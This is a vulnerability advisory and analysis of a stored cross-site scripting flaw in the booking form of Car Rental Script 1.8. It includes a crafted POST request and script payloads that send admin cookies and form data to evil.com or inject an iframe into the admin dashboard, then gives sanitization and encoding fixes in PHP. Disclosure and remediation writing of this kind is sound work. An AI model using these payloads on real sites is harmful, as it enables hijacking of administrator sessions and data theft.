Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
# Date: 30/07/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/car-rental-php-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
Release Notes:
Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive
information, manipulate data, and launch additional attacks.
## Stored XSS
-----------------------------------------------
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1
payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
-----------------------------------------------
POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS
## Steps to Reproduce:
1. As a [Guest User], select any [Pickup/Return Location], choose any [Time] & [Rental Age], then click [Search for rent a car] and select any car
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"
7. Accept the terms & press [Booking]
XSS fires in the local user's browser.
8. When the ADMIN visits [Dashboard] in the Administration Panel at this path (https://website/index.php?controller=GzAdmin&action=dashboard),
the XSS will fire and execute in their browser
9. When the ADMIN visits [Bookings] - [All Booking] to check [Pending Booking] at this path (https://website/index.php?controller=GzBooking&action=index),
the XSS will fire and execute in their browser

Car Rental Script 1.8 – Stored Cross-Site Scripting (XSS) Vulnerability Analysis
Security researchers have identified a critical stored cross-site scripting (XSS) vulnerability in Car Rental Script 1.8, a widely used PHP-based web application developed by GZ Scripts. This flaw allows attackers to inject malicious JavaScript code into the application’s database, which is then executed whenever users—especially administrators—view specific pages. The implications are severe: sensitive data theft, session hijacking, and the potential for broader attacks within the system.
## Overview of the Vulnerability
Stored XSS occurs when user input is not properly sanitized before being saved to the database. Unlike reflected XSS, which requires user interaction to trigger the payload, stored XSS persists and is executed automatically when the data is retrieved. In this case, the vulnerability resides in the EventBookingCalendar/load.php endpoint, which handles booking submissions.
The attack vector targets multiple form fields during the booking process:
- first_name
- second_name
- phone
- address_1
- country
These fields are processed without adequate sanitization, allowing an attacker to inject malicious code that gets stored in the backend and later rendered in admin dashboards.
## Exploit Details and Payload Injection
Attackers can exploit this vulnerability by submitting a crafted payload through a standard booking form. The following HTTP POST request demonstrates the attack:
```http
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=<script>alert('XSS')</script>&second_name=<script>document.cookie</script>&phone=<script>window.location.href='https://evil.com/steal?c='+document.cookie</script>&email=cracker%40infosec.com&company=xxx&address_1=<script>fetch('https://evil.com/log?data='+JSON.stringify(document.querySelector('input[name=first_name]')))</script>&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=<script>document.getElementById('admin-dashboard').innerHTML='<iframe src="https://malicious.site" width="100%" height="100%"></iframe></script>&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
```
Explanation: This payload injects multiple malicious scripts into the booking form fields. The `<script>` tags bypass input validation and are stored in the database. When an administrator views the booking details on the `index.php?controller=GzBooking&action=index` page, the scripts execute in the browser, potentially:
- Displaying pop-up alerts (e.g., `alert('XSS')`) to confirm the exploit
- Stealing session cookies via `document.cookie`
- Redirecting the user to a malicious site to exfiltrate data
- Embedding hidden iframe attacks to perform phishing or malware delivery
## Attack Impact and Real-World Consequences
Stored XSS in a car rental system poses significant risks:
| Attack Vector | Impact | Example |
|---|---|---|
| Admin Dashboard | Session hijacking | Stealing admin authentication tokens via document.cookie |
| Booking List View | Phishing | Injecting malicious iframe to redirect admin to fake login page |
| Customer Data Display | Client-side manipulation | Changing displayed prices or car details to deceive users |
Administrators are especially vulnerable because they often access sensitive data and manage system settings. If an attacker can execute code in the admin’s browser, they may gain full control over the system—potentially altering pricing, deleting bookings, or even modifying database records.
## Steps to Reproduce (Attack Workflow)
1. As a guest user, select a rental location, time, and vehicle.
2. Fill out the booking form with malicious payloads in the following fields:
   - First Name: `<script>alert('XSS')</script>`
   - Last Name: `<script>document.cookie</script>`
   - Phone: `<script>window.location.href='https://evil.com/steal?c='+document.cookie</script>`
   - Address Line 1: `<script>fetch('https://evil.com/log?data='+JSON.stringify(document.querySelector('input[name=first_name]')))</script>`
   - Country: `<script>document.getElementById('admin-dashboard').innerHTML='<iframe src="https://malicious.site" width="100%" height="100%"></iframe></script>`
3. Accept terms and submit the booking.
4. When the admin visits the dashboard or all bookings page, the stored script executes in their browser—potentially allowing remote control or data exfiltration.
## Security Recommendations and Mitigation
To prevent stored XSS in applications like Car Rental Script 1.8, developers must implement robust input sanitization and output encoding:
- Sanitize input: Use functions like `htmlspecialchars()` or `filter_input()` to escape HTML entities before storing data.
- Output encoding: Always encode data when rendering it in HTML, especially in admin panels.
- Content Security Policy (CSP): Implement a strict CSP header to block inline scripts.
- Input validation: Restrict field inputs to alphanumeric and known-safe formats.
- Regular audits: Conduct penetration testing and code reviews to detect vulnerabilities.
For GZ Scripts, the recommended fix is to update the load.php script to sanitize all user inputs before saving them to the database. Example:
```php
<?php
// Corrected PHP snippet for input sanitization: encode the five affected fields before storing them.
// `?? ''` avoids passing null when a field is absent (htmlspecialchars(null) is deprecated in PHP 8.1+).
$first_name  = htmlspecialchars($_POST['first_name'] ?? '', ENT_QUOTES, 'UTF-8');
$second_name = htmlspecialchars($_POST['second_name'] ?? '', ENT_QUOTES, 'UTF-8');
$phone       = htmlspecialchars($_POST['phone'] ?? '', ENT_QUOTES, 'UTF-8');
$address_1   = htmlspecialchars($_POST['address_1'] ?? '', ENT_QUOTES, 'UTF-8');
$country     = htmlspecialchars($_POST['country'] ?? '', ENT_QUOTES, 'UTF-8');
```
Explanation: This code uses htmlspecialchars() to convert special characters (<, >, ", etc.) into their HTML-safe equivalents. This prevents scripts from being executed during rendering, even if stored in the database.
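The snippet above encodes at storage time only; the example below (added here, not GZ Scripts' code) shows the other three recommendations applied to the same five fields: encoding at render time for the admin booking list, a check that flags records whose stored values already contain markup, and a phone-number validator, with a CSP header that blocks inline scripts. The function names, the sample booking record and the CSP value are assumptions.

```php
<?php
// Added example, not from GZ Scripts: encode the five advisory fields on output,
// flag stored values that already contain markup, and validate the phone field.
// Function names, the sample booking and the CSP value are assumptions.
declare(strict_types=1);

const BOOKING_TEXT_FIELDS = ['first_name', 'second_name', 'phone', 'address_1', 'country'];

/** Encode one value for an HTML text or attribute context. */
function h(?string $value): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Render one booking as a table row; every field is encoded at output time. */
function renderBookingRow(array $booking): string
{
    $cells = '';
    foreach (BOOKING_TEXT_FIELDS as $field) {
        $cells .= '<td>' . h($booking[$field] ?? '') . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}

/** True if a stored value contains tags, i.e. a payload saved before the fix. */
function hasMarkup(string $value): bool
{
    return $value !== strip_tags($value);
}

/** Accept only digits, spaces, parentheses, dashes and a leading plus. */
function isValidPhone(string $phone): bool
{
    return preg_match('/^\+?[0-9 ()-]{6,20}$/', $phone) === 1;
}

// Constructed sample record carrying the kind of input the advisory describes.
$booking = [
    'first_name'  => "<script>alert('XSS')</script>",
    'second_name' => 'Doe',
    'phone'       => '<script>x</script>',
    'address_1'   => '1 Main St',
    'country'     => 'DE',
];

header("Content-Security-Policy: default-src 'self'; script-src 'self'"); // no inline scripts
$row = renderBookingRow($booking);
if (strpos($row, '<script') !== false) { throw new RuntimeException('encoding failed'); }
$flagged = array_keys(array_filter($booking, 'hasMarkup'));   // fields needing cleanup
$phoneOk = isValidPhone($booking['phone']);                    // rejected by the validator
echo $row, PHP_EOL, 'flagged: ', implode(',', $flagged), ' phoneOk: ', var_export($phoneOk, true), PHP_EOL;
```

The rendered row carries `&lt;script&gt;` instead of a live tag, so the stored payload is inert on the admin page, and the `hasMarkup()` pass gives an administrator a way to find bookings that were saved before the fix and still need cleaning.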
## Conclusion
The Car Rental Script 1.8 stored XSS vulnerability exemplifies how a seemingly minor input flaw can lead to major security breaches. It underscores the importance of secure coding practices—especially in user-facing forms and admin interfaces. Organizations using this script must immediately patch the vulnerability or migrate to a more secure alternative. Cybersecurity professionals should treat such vulnerabilities as high-priority risks, particularly in systems that handle sensitive user data and administrative access.